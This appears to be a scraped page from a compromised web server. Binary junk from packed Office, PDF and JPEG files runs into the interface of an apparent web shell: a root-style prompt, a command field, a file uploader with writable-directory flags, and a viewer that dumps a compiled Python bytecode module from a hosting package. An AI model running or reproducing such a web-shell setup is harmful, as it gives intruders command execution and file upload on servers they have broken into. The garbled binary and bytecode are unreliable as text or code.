œ_#ÁÕ§TE NAŒ“KeÉ:”(åŽÖJÞùY’‚ñùž7; «]Û ý`8g“¯B© jd ÖÖ¸ðzœ¸¦4Ç3Kó^(ÍÖ¼ Õ€pvìwšõB4d f$Èü^0˜…åÌC$#2FŽÑ§±¦ÛZ/÷š&m£ñzÒÖ ’.Î]!Î;ƒ(Õ–¢d/—#Kª+tZyuÏB>NÛÖ†(¸ŒSà'³„Y˜´-_•¦¼´˜OlNK§¶ÒàŠˆTHµƒeTPå·fïM’…þuÏÍüp6دªE£åü‡ZØ'CKF#â«;‹eyO Qp„†l"ö1èíÙP ÏŒúl! BÝ2ñª•_VÁÉ÷3eu`–F¸ìI--ö<¿žë¯4õ캿¢)34Å{wMÉ2ÆÖFŸ¥` e9Ú¶¸P‡.”FÔï rY ‚²ÈTB,{ÛœéJ}«àQ4¹0Rû4D‚B§S‘ dO•v¾„™Sן¯3FeŸ™«+ÓâwH dÕÛÌì·P4ë&¥#rÜÉ Ù¦ê†ý·xòqk¯2,¹§™E\­ék‚×SᔏںÙ⺷ö£6…à ʾ qSá³Å|;àû}4Ÿ($â¹VY~óÍ!èÜÒŒËX½Ù1j‚VíÍŸš³+œ]«½g{_{/vµ½\¢¶vÉWKÿ:ñám½ ¥ S²x‘t ŽšÝÙÿÀÇ^ný PK   IW™k‚½÷ á  _rels/.relsUT dìd dìd dìd­’ÏNÃ0 ‡ï{ŠÈ÷ÕÝ@¡¥» ¤Ý*`%îÑ&QâÁöö‚J£ì°cœŸ¿|¶²ÙÆA½rL½wVE Šñ¶w­†çúay * 9Kƒw¬áÈ ¶ÕbóÄIîI]’Ê—4t"á1™ŽGJ…ìòMããH’±Å@æ…ZÆuYÞ`üÍ€jÂT;«!îì T} |Û7MoøÞ›ýÈNN<|v–í2ÄÜ¥ÏèšbË¢Ázó˜Ë )„"£O­Ï7ú{ZYÈ’yÞç#1'tuÉM?6o>Z´_å9›ëKÚ˜}?þ³žÏÌ·N>fµx PK    IWª½e  ¢ U  € word/document.xmlUT dìdPK    IWþË3” z  €J¢ word/settings.xmlUT dìdPK    IWC‡{š' ƒ  €¤ docProps/custom.xmlUT dìdPK    IW츱=Œ   €‡¥ [Content_Types].xmlUT dìdPK    IWV%ë±"   €U§ docProps/app.xmlUT dìdPK    IW€RŒ 3  €¶¨ docProps/core.xmlUT dìdPK    IWkòDn ô  €ª word/_rels/document.xml.relsUT dìdPK    IW ;$î   €Î« word/fontTable.xmlUT dìdPK    IW+åäz] ÷.  €ý¬ word/numbering.xmlUT dìdPK    IW¤2×r- ¿  €›° word/styles.xmlUT dìdPK    IWMFÒ ø  €´ word/header1.xmlUT dìdPK    IWF— T e  €· word/media/image1.jpegUT dìdPK    IW!Yéáå   €°Ë word/media/image2.pngUT dìdPK    IW°Àºë ú  €ÙÌ word/media/image3.pngUT dìdPK    IW$“†ª L  €Î word/footer1.xmlUT dìdPK    IWzaGôM   €ñÑ word/footer2.xmlUT dìdPK    IW–µ­âº P  €}Õ word/theme/theme1.xmlUT dìdPK    IW™k‚½÷ á €{Û _rels/.relsUT PK   ! bîh^   [Content_Types].xml ¢(   ¬”ËNÃ0E÷HüCä-Jܲ@5í‚Ç*Q>Àēƪc[žiiÿž‰ûB¡j7±ÏÜ{2ñÍh²nm¶‚ˆÆ»R ‹ÈÀU^7/ÅÇì%¿’rZYï @1__f› ˜q·ÃR4DáAJ¬h>€ãÚÇV߯¹ ªZ¨9ÈÛÁàNVÞ8Ê©ÓãÑÔji){^óã-I‹"{Üv^¥P!XS)bR¹rú—K¾s(¸3Õ`cÞ0†½ÝÎß»¾7M4²©ŠôªZƐk+¿|\|z¿(Ž‹ôPúº6h_-[ž@!‚ÒØ Pk‹´­2nÏ}Ä?£LËð Ýû%áÄßdºždN"m,à¥ÇžDO97*‚~§Èɸ8ÀOíc|n¦Ñ äEøÿöéºóÀBÉÀ!$}‡íàÈé;{ìÐå[ƒîñ–é2þ ÿÿ PK   ! µU0#ô L _rels/.rels ¢(   ¬’MOÃ0 †ïHü‡È÷ÕݐBKwAH»!T~€Iܵ£$Ý¿'TƒG½~üÊÛÝ<êÈ!öâ4¬‹;#¶w­†—úqu *&r–Fq¬áÄvÕõÕö™GJy(v½*«¸¨¡KÉß#FÓñD±Ï.W ¥†=™ZÆMYÞbø®ÕBSí­†°·7 ê“Ï›×–¦é ?ˆ9LìÒ™ÈsbgÙ®|Èl!õùUSh9i°bžr:"y_dlÀóD›¿ý|-NœÈR"4ø2ÏGÇ% õZ´4ñ˝yÄ7 ëÈðÉ‚‹¨Þ ÿÿ PK   ! Q48wÛ —  xl/workbook.xml¤UÙnâ0}iþ!cñ‡ *–¢AšVU×$dC¬&vÆv UÕŸë@XÊK§/¹p|Žï¹N÷b“¥Ö •Š ÞC¸î"‹òHÄŒ¯zèá~b·‘¥4á1I§=ôJºèÿüÑ] ù¼âÙ ®z(Ñ:GE ͈ª‹œrˆ,…̈†©\9*—”Ä*¡Tg©ã¹nàd„q´Eåg0ÄrÉ":Q‘Q®· ’¦D}•°\UhYô¸ŒÈç"·#‘å ±`)Ó¯%(²²(œ®¸d‘‚ì nZ w v¡ñª• t¶TÆ")”Xê:@;[Ògú±ë`|²›ó=ø’ïHúÂL÷¬dðEVÁ+8€a÷Ûh¬Uz%„Íû"ZsÏÍCýî’¥ôqk]‹äù5ÉL¦Rd¥Dé˘i÷P ¦bM/|dÉ",…¨çãFNoçiûéë>aêiçsó#ðÄ ÕTr¢éHp ÜIú®ÝJìQ"ÀÜÖ-ý[0I¡¦ÀZ Z…d¡nˆN¬B¦=4 g %PDF-1.4 %âãÏÓ 3 0 obj << /Linearized 1 /L 422775 ÿØÿà JFIF    ÿÛ C      ÿÛ C   ÿÀ  X" ÿÄ    ÿÄ H   !1A"Qaq2‘¡#±ÁBRÑ3Cbrá$S‚¢²ð4ñ%6DTc’ÂsÿÄ   ÿÄ =  !1AQ"aq‘Á2R¡±BÑð#3br’²4á$‚¢ÂñÿÚ   ? áHBßÝ`„! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! ! stream

___________________________ < root@rinduuu:~# /home/rinduuuuuuu?! > ___________________________

Command :

ikan Uploader :
Directory :  /opt/alt/python37/lib/python3.7/site-packages/ssa/modules/__pycache__/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //opt/alt/python37/lib/python3.7/site-packages/ssa/modules/__pycache__/processor.cpython-37.pyc
B

g��dy�@s�dZddlZddlZddlZddlZddlmZmZddlmZm	Z	m
Z
ddlmZm
Z
ddlmZddlmZdd	lmZdd
lmZddlmZmZmZmZdd
lmZddlmZmZm Z eGdd�de��Z!dS)z-
This module contains RequestProcessor class
�N)�datetime�	timedelta)�Thread�RLock�current_thread)�Callable�Any�)�
AutoTracer)�Common)�
DecisionMaker)�StatisticsSender�)�
session_scope�setup_database�
RequestResult�cleanup_old_data)�SSAError)�	singleton�	url_split�switch_schedstatscs�eZdZdZdZd#�fdd�	Zedd��Zed�d	d
�Z	dd�dd
�Z
dd�dd�Zee
d�dd�Zd$ed�dd�Zdd�Zeeed�dd��Zdd�Zd%dd�Zedd �d!d"�Z�ZS)&�RequestProcessorz^
    SSA Request processor implementation.
    Only one instance is allowed to be created
    �dNcsxt���t�d�|_|j�dt�tdd�|r6|nt�|_	t
�|_t|d�|_
t�|_t|d�|_|��g|_dS)NZ
req_processorzProcessor enabled: %sT)�enabled)�engine)�super�__init__�logging�	getLogger�logger�info�__package__rrrr�_lockr�decision_makerr
�senderr
�auto_tracer�start_background_routine�_buffer)�selfr)�	__class__��F/opt/alt/python37/lib/python3.7/site-packages/ssa/modules/processor.pyr)s

zRequestProcessor.__init__cCs
|jdS)zp
        Return config file value multiplied by 1000000,
        as we receive duration in microseconds
        i@B)Zrequests_duration)r(r*r*r+�configured_duration=sz$RequestProcessor.configured_duration)�reportc
CsJy|j�|�Wn4tk
rD}z|j�dt|��Wdd}~XYnXdS)z(
        Call Statistics Sender
        zStatisticsSender failed: %sN)r$�sendrr�error�str)r(r-�er*r*r+�
send_statsEszRequestProcessor.send_stats)�returncCs*t|jdd�}|��|j�d|j�dS)zA
        Start dumper|DecisionMaker thread in background
        T)�target�daemonz[%s] Routine startedN)r�background_routine�startrr �name)r(�tr*r*r+r&Nsz)RequestProcessor.start_background_routinecCs�x�t��}|jdkr�|jdkr�|j�dt�j|�|�|j	�|j�dt�j|�|�|j
�|j�dt�j|�|�|j�}|j�dt�j|�t|j
�|�|j|�tdd�|�d�q|�|j�qWd	S)
z�
        Dumps collected stats to file once an hour.
        Runs DecisionMaker once a day
        Cleanup storage after DecisionMaker run
        rz2[%s] Routine thread launching buffer flushing (%s)z-[%s] Routine thread launching AutoTracer (%s)z0[%s] Routine thread launching DecisionMaker (%s)z*[%s] Routine thread launching cleanup (%s)T)r�<N)r�now�minute�hourrr rr8�
_safe_exec�flush_with_lockr%r#rrr2r�
_simple_sleep�_sleep_till_next_hour)r(Ztickr-r*r*r+r6Vs0



z#RequestProcessor.background_routine)�actionr3cGsRy||�Stk
rLt��\}}}|jjdt|�||dt��id�YnXdS)zACall requested Callable with given args and capture any exceptionz%s failed with exception %s, %sZorig_traceback)�extraN)�	Exception�sys�exc_infor�	exceptionr0�	traceback�
format_exc)r(rB�args�et�ev�_r*r*r+r>ys
zRequestProcessor._safe_exec�)�to_sleepcCs"|j�dt�j|�t�|�dS)zP
        Log and sleep given number of seconds or 15 minutes by default
        z%[%s] Routine thread sleeping for (%s)N)rr rr8�time�sleep)r(rOr*r*r+r@�szRequestProcessor._simple_sleepcCs*tdd�t|d���}|�t|��dS)zF
        Sleep the number of minutes remaining till next hour
        r	)�hours)�minutesN)r�
total_secondsr@�int)r(Zstart_minuteZ	sleep_forr*r*r+rA�s
z&RequestProcessor._sleep_till_next_hour)�	timestampr3cCst�|�jS)zN
        Takes an hour of a day, to which the given timestamp belongs
        )r�
fromtimestampr=)rVr*r*r+�get_interval_for�sz!RequestProcessor.get_interval_forc	Cs4|j�|jdd�}g|_WdQRX|�|�dS)N)r"r'�flush_buffer)r(�objectsr*r*r+r?�sz RequestProcessor.flush_with_lockc	Cs:|dkr|j}|sdSt|j��}|�|�WdQRXdS)z6
        Save in-memory buffer into database.
        N)r'rrZbulk_save_objects)r(rZ�dbr*r*r+rY�szRequestProcessor.flush_buffer)�datar3cCs�|�d�}|�|�r&|j�d|�dSt|�\}}|j�dt�j�g}|j�n|j�	t
|||d|d|d|jk|d|d|d	|d
d�	�t|j�|j
kr�|jdd�}g|_WdQRX|�|�|j�dt�j�dS)
z,
        Process given request data
        �urlz
%s ignoredNz-[%s] Acquires lock to handle request countersrV�duration�hitting_limits�throttled_time�io_throttled_time�	wordpress)	�domain�pathrVr^Zis_slow_requestr_r`rarbz-[%s] Released lock to handle request counters)�getZ
is_ignoredr�debugrrr8r"r'�appendrr,�len�BUFFER_SIZErY)r(r\r]rc�uriZobjects_per_threadr*r*r+�handle�s4



zRequestProcessor.handle)N)rN)N)�__name__�
__module__�__qualname__�__doc__rir�propertyr,�dictr2r&r6rrr>rUr@rA�staticmethodrXr?rYrk�
__classcell__r*r*)r)r+r s	#


r)"rorrErPrHrr�	threadingrrr�typingrrZ
autotracerr
�commonrr#rZstat_senderr
r[rrrr�internal.exceptionsr�internal.utilsrrrrr*r*r*r+�<module>
s 

........